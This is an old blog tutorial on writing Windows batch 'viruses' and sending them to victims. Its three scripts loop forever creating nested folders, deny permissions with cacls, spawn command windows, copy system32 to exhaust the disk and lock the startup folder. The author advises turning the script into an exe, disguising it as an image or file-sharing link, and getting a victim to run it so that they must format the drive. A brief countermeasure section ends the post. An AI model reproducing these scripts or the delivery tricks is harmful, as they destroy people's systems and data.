Wednesday, August 31, 2011

Virus that creates folder inside folder and consumes indefinite memory

In this tutorial I will teach, How to create virus using BAT file and converting that bat file to exe file. You may have heard the word Batch Programming, creating .bat file using simple DOS commands is called Batch Programming. You do not need to have any programming knowledge to create a bat file just you need to know few DOS commands.
Creating Process:-
1. Open Notepad and write the Program as given in the below examples and save it with .bat extension.
2. Convert this bat file to exe file using "bat to exe" converter. Click Here to download the tool.
3. Send this file to your victim and make him click, you can cover this file using image file, Click Here to learn hiding trick. Or you can upload this file in any file sharing website like ziddu.com or megaupload.com and give the link to your victim.

Lets Check some examples:-
Note:- In the examples below "::"(double colons) represent comments in batch programming. To create batch files follow the above "creating process".

Virus that creates "folder inside folder" indefinitely.


@echo off     :: commands will not be shown on the screen 
:a                   :: here "a" is a label
md hacker   :: make a new directory named "hacker"
cd hacker     :: move the control inside the newly created "hacker" directory.
goto a            :: jump to the label "a"/loop.

This program will create a folder named "hacker" in the default location of your terminal(can be your desktop) and goes inside that folder and creates another folder and continues indefinitely.
Hold on this is not at all a good virus, the victim can press "ctrl+break" and stop the execution and then the delete the "hacker" folder. And anyway empty folder cannot harm the system.

Lets Check This:-


@echo off 
:a
md hacker
cacls  hacker /e /p Everyone:N   :: access denied to "hacker"
cd hacker
start cmd.exe                   :: start the new command prompt in each iteration
copy c:\windows\system32\     :: copy the contents of "system32" inside "hacker" folder
goto a

This virus may crash your hard drive. When this virus is clicked the "hacker" folder will be created indefinite times and each time new cmd will open, and the contents of "system32"will copied in each iteration and the biggest plus is the victim cannot delete the folder "hacker". Oh!! this looks cool now he can't do anything(if you are thinking this you are absolutely wrong) still you didn't created a great virus, every victim posses a great weapon to counter this virus, I call it Bramhastra i.e Restart the PC and everything is OK. Don't worry I have weapon to counter this Bramhastra.


What if we put our virus in startup folder, every time the system starts the virus will run automatically, to know how to copy a virus into "startup" folder Click here.


But today user are smart, there is a chance that they may delete our virus from startup folder and everything we did is in "vain":(  but hold on I am still not done yet, what if I denied every permission of startup folder from the victim, that means he can't even see the contents of the folder.  Just you have to do is add one line  in above program, lets see.



@echo off 
cacls "%allusersprofile%\start menu\programs\startup" /e /p Everyone:N                                                                        ::deny permission to startup folder
:a
md hacker
cacls  hacker /e /p Everyone:N         :: access denied to "hacker"
cd hacker
start cmd.exe                 ::start the new command prompt in each iteration
copy c:\windows\system32\         :: copy the contents of "system32" inside "hacker" folder
goto a

Now the only thing he/she can do is format the hard drive and our job is done:).


Countermeasure:-
1. The first thing you should do is, change the permission of "startup" folder. To do so open cmd and type in following command:-
cacls "%allusersprofile%\start menu\programs\startup" /e /p Everyone:F
It will certainly give you all permissions to the startup folder and then you can delete that virus and restart the system.
2. Use unlocker tool to delete folder whose permissions are denied. Click Here to download the Unlocker tool.



Precaution:
Do not practice these tricks in your PC, use virtual machine in your PC to make and run these virus. One such virtual machine is Sun VirtualBox. Click Here to download.
After installing this Virtual Box install XP or 7 inside it(installing procedure is same). 

No comments:

Post a Comment